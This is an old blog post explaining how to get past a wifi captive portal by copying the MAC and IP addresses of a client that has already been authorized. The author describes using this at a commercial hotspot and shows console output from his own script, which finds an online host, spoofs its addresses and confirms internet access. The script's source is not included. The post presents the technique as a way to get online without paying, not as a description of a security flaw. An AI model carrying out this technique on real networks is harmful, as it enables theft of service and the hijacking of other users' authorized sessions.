Bypass a wifi captive portal
Posted Sat, 11 Aug 2007
The simple way to abuse this is to set your ethernet and ip addresses to one that you know has already been authorized by the captive portal system. Poof. Internet access.
How do we find one? Certainly it's simple to sniff traffic and find anyone able to access the outside network, but it's a manual process. To automate it, I wrote a simple script to do the discovery and testing automatically.
I figured a tmobile hotspot was the perfect place to try this. I change my mac address and flush my browser cookies, and now I look like a new, potential customer to the captive portal. After I verify I cannot get outside of the local network, I ran my new little script. It worked by finding another person on the wireless network who was authorized to go online and then set my ethernet and ip addresses accordingly. Yay internet.
This particular script will only work in FreeBSD, but can easily be fixed to work in Linux or another OS.
This is the output from running it on the network at my house.
nightfall(~) 1 % sudo ./wifipencap.sh -i ath0 DHCPREQUEST on ath0 to 255.255.255.255 port 67 DHCPREQUEST on ath0 to 255.255.255.255 port 67 DHCPACK from 192.168.0.3 bound to 192.168.0.179 -- renewal in 43200 seconds. Restore your old mac address with: ifconfig ath0 down; ifconfig ath0 ether 00:de:ad:be:ef:01; ifconfig ath0 up Looking for active nodes on the network Trying 192.168.0.12 00:0c:29:94:3e:0b Waiting for associate Waiting for associate route: writing to routing socket: No such process delete net default: not in table add net default: gateway 192.168.0.254 pinging google PING google.com (18.104.22.168): 56 data bytes 64 bytes from 22.214.171.124: icmp_seq=0 ttl=237 time=109.113 ms 64 bytes from 126.96.36.199: icmp_seq=1 ttl=237 time=108.448 ms 64 bytes from 188.8.131.52: icmp_seq=2 ttl=237 time=107.633 ms 64 bytes from 184.108.40.206: icmp_seq=3 ttl=237 time=107.454 ms 64 bytes from 220.127.116.11: icmp_seq=4 ttl=237 time=107.394 ms --- google.com ping statistics --- 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max/stddev = 107.394/108.008/109.113/0.669 ms Found something that can reach the internet Mac: 00:0c:29:94:3e:0b IP: 192.168.0.12 Exiting... You can now get online.